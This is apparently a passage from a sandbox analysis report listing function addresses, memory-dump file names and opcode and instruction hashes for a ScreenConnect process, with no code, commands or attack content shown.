Opcode ID: 40f071a6486d99e5ce3e253f1cd2c965824fc053db7d26a64d04ce3a576c7446
Instruction ID: 6f6523bfc4a6e0a85687c3d6f64b519d3f873dd63324336281f16e1e703d3f89
Opcode Fuzzy Hash: 40f071a6486d99e5ce3e253f1cd2c965824fc053db7d26a64d04ce3a576c7446
Instruction Fuzzy Hash: 9111A334B001019FC706DBA8D4545AEFFB7EF89711B54816EDA09AB352DB31EC05C791

Function 0169D597 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3391496520.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_169d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 84372f9a14c6e2a69ee3ce5591b56ca8740691c78937e6cd0187a0350d4cef55
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: E511DF76504284CFCF02CF44D9C4B16BF62FB84314F2482A9D8090B257C33AD45ACBA1

Function 019F4E44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e5f55ce4e8c1664f8f2c7c9ee8c98ff728a488a0d52d1e110a3e8828fad93e
Instruction ID: 3260f10217ccb31652bf394447c7b2a3416e73c94b4edebb4c14661681464382
Opcode Fuzzy Hash: 49e5f55ce4e8c1664f8f2c7c9ee8c98ff728a488a0d52d1e110a3e8828fad93e
Instruction Fuzzy Hash: AB2136B1800209DFDB10CF9AC444BDEFBF4EB48320F11842AEA18A7201D7B8A545CFA5

Function 019FFA80 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8ec13b6e2f012f5e0aa389e8b0f11d202e85ad50864530b2fd6370c5e1bd7f
Instruction ID: e46b309561e81f8aabed7ee52392f1fcab2bba02337f74fcea75a17b87656f5a
Opcode Fuzzy Hash: aa8ec13b6e2f012f5e0aa389e8b0f11d202e85ad50864530b2fd6370c5e1bd7f
Instruction Fuzzy Hash: 7B0144773010149B8704EB6EF89496EB7EEFBC8665354847BE509C7325DA32DC138768

Function 019F91B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fe2289acf9e55f885e540f743d61d44ce1dd65c517941defaa882509a56207f
Instruction ID: 62c6c5f9620fc464da0a5d5454445bf49f19cfd08560db1cd7ac84c552ecdbd8
Opcode Fuzzy Hash: 7fe2289acf9e55f885e540f743d61d44ce1dd65c517941defaa882509a56207f
Instruction Fuzzy Hash: 2B118E75E40209AFEB15CB69C800AEBBBBAABC4304F148969E618D7254E7719901CB91

Function 019F8B95 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e607a0171c60d0d4b3b5974178a2ac98e6eca7bcbca2a5cffb8cbfc5792af5
Instruction ID: 51f4cedc68f8ec67c1ef1a6452cdb48792bf03dc45c6255c95a12195372f48ca
Opcode Fuzzy Hash: c5e607a0171c60d0d4b3b5974178a2ac98e6eca7bcbca2a5cffb8cbfc5792af5
Instruction Fuzzy Hash: 77115E31A0004DEBCF45DFA8D9449DCBFB2FF85315B54C548E209AB116C731A946CB60

Function 019FCBC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dfaa76a10ef70e5f3c2056a56981318bc17d12a597f261fa901fccde7907a3f
Instruction ID: 470d8e68e3fff8090680bfc337f0c9a090f9c211b310ee37c1fa562d141703b0
Opcode Fuzzy Hash: 9dfaa76a10ef70e5f3c2056a56981318bc17d12a597f261fa901fccde7907a3f
Instruction Fuzzy Hash: F2110671E1421CDBDF14DBA8D860AEDBBB1AF88310F00486AD205BB3A0DB742944CBA0

Function 019FECB1 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28716a4e2e6df7de990d54551982a72b34df2c1ac296045e1ae544c7aa4fab84
Instruction ID: ef90b0bb7121e5522dfda7519e3b027ac8d4a51f74c09d9f551f395eb490d084
Opcode Fuzzy Hash: 28716a4e2e6df7de990d54551982a72b34df2c1ac296045e1ae544c7aa4fab84
Instruction Fuzzy Hash: 56118E7080434AAFDB14DF6CC444A6ABFF4AF45320F15869EE658DB2A2E774E541CB81

Function 019F8AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac2d3099066d42d89e7f4b841c9be6c347922af2bf1dc70dc0228c566bfbc59
Instruction ID: 6a85c170ee6343ff8898915236521d1b38e6c42ebe420fa3b057466b1bee7b63
Opcode Fuzzy Hash: dac2d3099066d42d89e7f4b841c9be6c347922af2bf1dc70dc0228c566bfbc59
Instruction Fuzzy Hash: 1411FE7590010ADFCF01DFA8D9409DEBBF5FF49314B508569E605BB251D771AA0ACB90

Function 019FE16B Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a37768b3a4a363d073bf27a5524620c458c1b350e86386976608dfd4e09e30
Instruction ID: 435364be3364219493d13a63858e2b8b878954787653cf7cffd8be3a49b1a068
Opcode Fuzzy Hash: f2a37768b3a4a363d073bf27a5524620c458c1b350e86386976608dfd4e09e30
Instruction Fuzzy Hash: E7114071B002069FDB05DF68DC815ADBBF5FF89311B14816AE6099B361DB30AD16CF91

Function 019FCBB0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6035552db677ff526f3d7bca460f64badda6406b4d0277268ff8f9ca82863e31
Instruction ID: 09bed32d4d6cd4e86e622abba81c5722c0ea10fa24fea3e4277321296ffa5292
Opcode Fuzzy Hash: 6035552db677ff526f3d7bca460f64badda6406b4d0277268ff8f9ca82863e31
Instruction Fuzzy Hash: 23110671D0825CABDF159BA8D860BED7BB5AB49310F01486AD206BB2A1DA781940CBA1

Function 019FA9C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8c0fe94bdd4064e4b3b6fd8c996d85d7705202bb8142ae8a0918419ba44939
Instruction ID: 348c1288857a8375b8b4ff0a75d09b3db1a9aeb3507c47db46bb03d3731ca612
Opcode Fuzzy Hash: 0c8c0fe94bdd4064e4b3b6fd8c996d85d7705202bb8142ae8a0918419ba44939
Instruction Fuzzy Hash: B501D672B002156B8B199B6DAC044ABBBDEFBC4624314856ED60DDB305EEB2DC068BD0

Function 019FF9E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2452f944b378ec7984aef6784ac9088e691c7b74c6d19c98b90817853b93804
Instruction ID: 3d94bfd8a955b608d27e15c0d7f943b5d5612b836c668589d4211830d0cf80dc
Opcode Fuzzy Hash: d2452f944b378ec7984aef6784ac9088e691c7b74c6d19c98b90817853b93804
Instruction Fuzzy Hash: DF014C75308340AFC711976E9C5461BBFD9EFC222470881FFD658CB362EE64AC058B55

Function 0169D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3391496520.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_169d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28abde3fdcd93d9a09f3a92bdd92bdf1a0cb14e28631c408197f05c4ba7be41
Instruction ID: 8cea14b35e46bfe43e7b31c3b54ffa6cf0296719ec1153218e2f53610942cbf1
Opcode Fuzzy Hash: c28abde3fdcd93d9a09f3a92bdd92bdf1a0cb14e28631c408197f05c4ba7be41
Instruction Fuzzy Hash: 49019E7140A3809FE7128F65CC84752BFA8EF42224F18809BE9888F2A3C2699845CB71

Function 0169D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3391496520.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_169d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec6a70593b6257a97d148c9994dfdcf91b093380dc62146cf2c21c243796d55
Instruction ID: 2f3584d3dfccb5c7bffce41e1050789899cad3095543cf959c9672d9c292545d
Opcode Fuzzy Hash: 1ec6a70593b6257a97d148c9994dfdcf91b093380dc62146cf2c21c243796d55
Instruction Fuzzy Hash: 7401F7714043449BEB104EA9CD80B66BF9CEF413A4F08C12AEE080B282C7B99442C6B1

Function 019FF630 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cb1384d2715f12f1b78d5fb541437676568701e9b00882b054231c987b31978
Instruction ID: 756b0a15c7601860a049c046e4d78f03d25ec019820d555ba01a49d566d4ade1
Opcode Fuzzy Hash: 9cb1384d2715f12f1b78d5fb541437676568701e9b00882b054231c987b31978
Instruction Fuzzy Hash: 63F0FC776042497FEF025EA89C00ADF3FABEB99364F01402AFB08D7391DA715C1197A5

Function 064C03CF Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c64dc04dd5bc0830bae8b08384a151c5ffdfa7cddfd6cc3bab49be3ff66d03
Instruction ID: 6444915b24c1750a138122006c4a9d676cae958ac81f18a8c785b42c8dbe15f6
Opcode Fuzzy Hash: 32c64dc04dd5bc0830bae8b08384a151c5ffdfa7cddfd6cc3bab49be3ff66d03
Instruction Fuzzy Hash: 9C014874A15109CFDB84DFA8C455A6ABBF0EF14614F5040AAD50997351E631E9418B85

Function 019F8B40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87763593160db73e5b94ce1030c3f53101eff0a569201cc991aea937127e48bb
Instruction ID: cbb3d321eba4b44cb8be2cd9fb17709365de0fa4575ca6bd20c996e1253335a6
Opcode Fuzzy Hash: 87763593160db73e5b94ce1030c3f53101eff0a569201cc991aea937127e48bb
Instruction Fuzzy Hash: E5012832D0015DDBCF09DFA9D9048CDBBB6EF89314F45856AE509B7251DB306906CBA4

Function 064C03E0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456b7f6ad28251f8bc0d4b005a41b2d75d9db778d9f1993528d23f464136adce
Instruction ID: ac3c685ca68bc91f06701be61f783d46d0637c26285f3a8102d626ef1356f460
Opcode Fuzzy Hash: 456b7f6ad28251f8bc0d4b005a41b2d75d9db778d9f1993528d23f464136adce
Instruction Fuzzy Hash: BC015634E1150ACFDB88DBA8C064A6F7BF1AF44704F2080AED509CB351EA31D941CB80

Function 019FA9A1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85897e4aab8dd91bbf6db249a642613de3eb6d1b6add4e6da0e0f3a42955406b
Instruction ID: 447574412d1eee586367c089c2371015d601bf173d0af1be950f9115b239fbff
Opcode Fuzzy Hash: 85897e4aab8dd91bbf6db249a642613de3eb6d1b6add4e6da0e0f3a42955406b
Instruction Fuzzy Hash: 1AF0BE6A50E3C42FD72303396C207A63F989F83066F0F04EBD58CCB193D9184C0683A1

Function 019F329C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc572d2760951fde7428b0fdf0a07843fe4a9a38c26f45cbcba973dc5a381c25
Instruction ID: e020a102cd880b946419c73460b122d563d38289f34577e86e52c233f8687843
Opcode Fuzzy Hash: cc572d2760951fde7428b0fdf0a07843fe4a9a38c26f45cbcba973dc5a381c25
Instruction Fuzzy Hash: 78F0461250D2819FD713D769A8516993FA0FEE235038845CFD285CF653D9889A06C361

Function 019FBCC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc060a482573ededb69c869bdbbca0b2ceeb4506c515122038f7199f02c3d39
Instruction ID: 7c615565f275619d58c7b7b37a3c9ab9be1eb734cdd0f65658f9294ae4793574
Opcode Fuzzy Hash: 3dc060a482573ededb69c869bdbbca0b2ceeb4506c515122038f7199f02c3d39
Instruction Fuzzy Hash: 93F05836B092446AD728CAAEA400A9BBBDECBD4220B1480BFE95DC3640E931A4008764

Function 019F31E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c44775723d306bc0c6d6adfab0e8adad55ffd516f95d5b3ada10a8e80dbcffc
Instruction ID: b32963ec271affad4d1910e06845be5e33e1644ccff1185896edba0c35f03a63
Opcode Fuzzy Hash: 0c44775723d306bc0c6d6adfab0e8adad55ffd516f95d5b3ada10a8e80dbcffc
Instruction Fuzzy Hash: 46F08C34904288EFCB05EBA8C84529DBFB1FB01211F6440AEC608AB216D7382F40CB11

Function 019FF640 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8149de9667806e810c9932dfd3079c89bd920757e0a8c5d2944b142b63310106
Instruction ID: 8db49ffc5a155ff0b1c9a1d89a9035d9318f71a8ae7e22183000c0bacd3b3491
Opcode Fuzzy Hash: 8149de9667806e810c9932dfd3079c89bd920757e0a8c5d2944b142b63310106
Instruction Fuzzy Hash: 66F082763002196FDF059E989C009EF7BABEBC8360B00402AFB09D3350DA729C1197A5

Function 064C1580 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b752eb669ae4e31c53b39e22c93780f320590fd0873969fbdcce8ae1f9d7fb10
Instruction ID: 9a1b4865f8e694d7afb8d6f9e0e29a741af08718a48cdf30389b2e59545464ce
Opcode Fuzzy Hash: b752eb669ae4e31c53b39e22c93780f320590fd0873969fbdcce8ae1f9d7fb10
Instruction Fuzzy Hash: EDF0B43110E3809FC3028B69AC9595F7FB4DB86214B19449FE189CF313CD196C06CBB2

Function 019FFA08 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728bc255de41bc625b77a4e0f3d49380dd30d96667e6e32c885344dfc6e04867
Instruction ID: 2e1711c103342eb157552d87e9d38ab0bfe62c13f91a7719fbb99545755d7007
Opcode Fuzzy Hash: 728bc255de41bc625b77a4e0f3d49380dd30d96667e6e32c885344dfc6e04867
Instruction Fuzzy Hash: 6BF08276300301AB9725EB6EEC8495BBBDEEBC4650304842ED719C7314EFA5FC058B90

Function 019FE260 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756dc1b2758e55760f6d62ff42a229bf19442dded5f85569590a5655e43c0403
Instruction ID: 3daa724dd7d0c1d3ac62e6669ab13c77a251013e0dd40b98d893283b1f2832bf
Opcode Fuzzy Hash: 756dc1b2758e55760f6d62ff42a229bf19442dded5f85569590a5655e43c0403
Instruction Fuzzy Hash: 8EF01975D042499FCB41DFACD80069EFBF5AF89200F14806AD558E7261E3319A12CB81

Function 019FAA48 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097951b99f41adf55f8e4fb03839d4df83fc7c4c4a2b0a991a6e89cb9bbd177d
Instruction ID: 13820849766ac7f91f55eaa7cacecab00f111e43c9e6b86f589f094c8ea75a63
Opcode Fuzzy Hash: 097951b99f41adf55f8e4fb03839d4df83fc7c4c4a2b0a991a6e89cb9bbd177d
Instruction Fuzzy Hash: 78F05C313002400FCB101B6AA8846997FDBEFC9511F44007DD10DC7342CD218C0A8750

Function 019FF93F Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb6e6b6604692c12eaee4052286a354942b4727e32fc7bad53f35880a827312
Instruction ID: e729eb72e7fa0002c2201c60b093ca326325521f4d84a41111260b88b43b53b6
Opcode Fuzzy Hash: bcb6e6b6604692c12eaee4052286a354942b4727e32fc7bad53f35880a827312
Instruction Fuzzy Hash: E6F0273130A3412BC7015229AC50B427BA9EBC6720F12407ED108872D6C9A25C028350

Function 019F5920 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908bd9817c839fc8a5cd50128daf2f4ae2a4734979292f4d6026829630d120dc
Instruction ID: 01796862c858c6ff463b1f03afe7f9ef5d83980faaa33a6f2b5a3d016f437193
Opcode Fuzzy Hash: 908bd9817c839fc8a5cd50128daf2f4ae2a4734979292f4d6026829630d120dc
Instruction Fuzzy Hash: CAF0A7B23013556BC70E5638A81845A7FAAEBD6133349C06AE606D33D2DA349C07C794

Function 019F31F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3ec5b0f06506faa3249474de82bb8cf1927eeefa4d98d6339dbdd8163ec505
Instruction ID: d2b03c772dfb95e79891c193c2500611eb40f1b63806f2cb11b4f2a52a32b826
Opcode Fuzzy Hash: 0f3ec5b0f06506faa3249474de82bb8cf1927eeefa4d98d6339dbdd8163ec505
Instruction Fuzzy Hash: 3CF0E238A00208EFDB04EBA8D845AEDBBB5FB44356F6040A9C609A7245DB346F40CB55

Function 019FBCBB Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dadc4987db2444a3083ed43a67b972fc492211ba28c9451ee92a7dba65eefe0
Instruction ID: f4c5bb6b7b24a47f80a4ae3f36a1916dcd0b6ea5ada0336363be22467c4cbb80
Opcode Fuzzy Hash: 1dadc4987db2444a3083ed43a67b972fc492211ba28c9451ee92a7dba65eefe0
Instruction Fuzzy Hash: C3F0A072E093845FC7658A7AA80099B7BE9DF9521070580BFE50DD3141E93484018724

Function 019FE2AA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc37d6329a5ab7bf5be5d9d1a1a54fa6f2a8fa8807825efbf739ccb86669fa85
Instruction ID: d242059199d57f1464533d97d42b1b96b056328c4f31029b82670f1e2302e0ca
Opcode Fuzzy Hash: bc37d6329a5ab7bf5be5d9d1a1a54fa6f2a8fa8807825efbf739ccb86669fa85
Instruction Fuzzy Hash: 2EF03A34700114DFDB19DF6DC454AAEBBE1EF883507068069EA09CB364EB34DD01CB81

Function 019FEBA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3a2bc6c9d562953963157d329da3476f335339df90d4ccb8640a3b1b48f318
Instruction ID: 113bb7ea7ae71d643455b3fb1a92206385d897c10d381ad3fb57dfd2a553e683
Opcode Fuzzy Hash: fb3a2bc6c9d562953963157d329da3476f335339df90d4ccb8640a3b1b48f318
Instruction Fuzzy Hash: E2E03035B041096B5B54DA4ED800D9BBBAADBC8221715C12AFA1DC7311D931D91187A4

Function 019F52E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845868d6c8f0deea5baa8f10f4692c995473ab0b82371c66914966e53aaf7ef8
Instruction ID: 7427e79e63211e60ef1c324b6dafbb444ec093b8f01ed731f82e7cfdeec4cb24
Opcode Fuzzy Hash: 845868d6c8f0deea5baa8f10f4692c995473ab0b82371c66914966e53aaf7ef8
Instruction Fuzzy Hash: 51E02231A083453BDF0996ACA8106DDBFFDDB47320F5641AEE20DD7292D8655C428398

Function 064C2094 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3406403739.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_64c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4ae695f9cebd39b037e6e52af8517c0ea0ab45b0672aa8b06f72cad3992d65
Instruction ID: 6c3640911366bdc694185b3fbe944ec962886250eae1c6cf606bfc2c6e2fc36a
Opcode Fuzzy Hash: ca4ae695f9cebd39b037e6e52af8517c0ea0ab45b0672aa8b06f72cad3992d65
Instruction Fuzzy Hash: ADF0F84240E3E04EE307A7388CB53817F609F53218F0E91CBC0D2CE0E3E958854ACB96

Function 019F0E20 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829df580b297368b2a02ee45ee728c52733b37b5ec18d695704e5ab5c1486d77
Instruction ID: 0fb4d816520ea9b460a54b7bb1fca3bc4bc0327c4fd920692de78dd873ad580b
Opcode Fuzzy Hash: 829df580b297368b2a02ee45ee728c52733b37b5ec18d695704e5ab5c1486d77
Instruction Fuzzy Hash: AEF0A7323042405FC715A778AC1009B7FA6FAC221574485BFE249CB642DE626C068BE1

Function 019FE270 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3393948799.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_19f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fdc89529014357c8c44665bcb10280a64f49addbc01c1eb7d6c792a85c1796
Instruction ID: 043b78c5d276f9ad3315427bf94f41f72a1b2240873a9d0b2cc091226e78c94e
